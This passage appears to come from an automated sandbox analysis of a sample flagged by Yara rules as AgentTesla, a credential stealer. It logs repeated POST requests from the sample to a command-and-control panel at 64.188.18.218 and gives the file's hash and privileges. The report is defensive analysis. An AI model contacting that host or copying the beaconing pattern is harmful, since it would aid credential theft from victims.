                  Host: 64.188.18.218
                  Content-Length: 376
                  Expect: 100-continue
                  Jan 13, 2021 15:26:02.473714113 CET742INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:26:02.620726109 CET754INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:26:02 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  6192.168.2.54973264.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData
                  Jan 13, 2021 15:26:03.733129025 CET757OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 378
                  Expect: 100-continue
                  Jan 13, 2021 15:26:03.862329006 CET757INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:26:03.995359898 CET758INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:26:03 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  7192.168.2.54973364.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData
                  Jan 13, 2021 15:26:05.254686117 CET761OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 376
                  Expect: 100-continue
                  Jan 13, 2021 15:26:05.386487007 CET761INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:26:05.516742945 CET762INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:26:05 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  8192.168.2.54973464.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData
                  Jan 13, 2021 15:26:06.843626022 CET765OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 376
                  Expect: 100-continue
                  Jan 13, 2021 15:26:06.974791050 CET768INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:26:07.114841938 CET769INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:26:06 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  9192.168.2.54973664.188.18.21880C:\Users\user\Desktop\file.exe
                  TimestampkBytes transferredDirectionData
                  Jan 13, 2021 15:26:08.599234104 CET774OUTPOST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                  Content-Type: application/x-www-form-urlencoded
                  Host: 64.188.18.218
                  Content-Length: 376
                  Expect: 100-continue
                  Jan 13, 2021 15:26:08.721358061 CET775INHTTP/1.1 100 Continue
                  Jan 13, 2021 15:26:08.851656914 CET776INHTTP/1.1 200 OK
                  Date: Wed, 13 Jan 2021 14:26:08 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                  X-Powered-By: PHP/7.2.34
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8


                  Code Manipulations

                  Statistics

                  System Behavior

                  General

                  Start time:15:25:38
                  Start date:13/01/2021
                  Path:C:\Users\user\Desktop\file.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\user\Desktop\file.exe'
                  Imagebase:0x8d0000
                  File size:221184 bytes
                  MD5 hash:2E1FCFB191508FC51320313D059BD30D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.610250985.00000000008D2000.00000002.00020000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.614009844.00000000031DD000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000000.228406188.00000000008D2000.00000002.00020000.sdmp, Author: Joe Security
                  Reputation:low

                  Disassembly

                  Code Analysis

                  Reset < >